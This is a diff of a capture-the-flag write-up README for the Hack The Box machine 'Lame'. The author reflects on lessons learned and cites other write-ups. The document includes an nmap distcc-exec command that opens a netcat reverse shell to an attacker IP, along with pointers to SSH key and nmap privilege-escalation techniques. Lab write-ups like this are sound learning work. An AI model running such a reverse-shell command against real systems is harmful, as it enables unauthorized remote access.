pierretallotte/ctf-writeups/htb-lame/README.md

 ### 0xdf writeup
 In 0xdf writeup, there is an explanation on why the exploit for the vsftpd server fails.
 It seems to be due to the firewall.
 There is also a demo to check it: https://0xdf.gitlab.io/2020/04/07/htb-lame.html#beyond-root---vsftpd

-There is also a writeup on the distcc exploit that I used: https://0xdf.gitlab.io/2020/04/08/htb-lame-more.html I like the remote shell command which is more simpler than me:
+There is also a writeup on the `distcc` exploit that I used: https://0xdf.gitlab.io/2020/04/08/htb-lame-more.html I like the remote shell command which is simpler than me:
 ```
 nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc -e /bin/sh 10.10.14.24 443'"
 ```
 There are also multiple ways to get privilege escalation.
 The first one is by using a vulnerability on how the root SSH key has been generated (see CVE-2008-0166).
-It makes the key predictible and you can get the private key back from the public key.
+It makes the key predictable, and you can get the private key back from the public key.
-I had been a little bit lucky (and helped by the syntax coloration of linpeas.sh) to guess that nmap could be used to get privilege escalation.
+I had been a bit lucky (and helped by the syntax coloration of linpeas.sh) to guess that nmap could be used to get privilege escalation.
 However, there is the GTFOBins website that can be used to find how to escalate privilege with different binaries: https://gtfobins.github.io/
 ## Lessons learned
 I could break this box so much quickly.
 I lost time on the Samba server, trying to connect and looking into the files in it.
-I also missed the distcc open port at first because I focused on the vulnerable FTP server without finishing the enumaration.
+I also missed the `distcc` open port at first because I focused on the vulnerable FTP server without finishing the enumeration.
 In the future:
 * I should do a proper enumeration first by looking at the data available and what could be possible to exploit without doing right now,
 * I should read carefully the logs of the scan,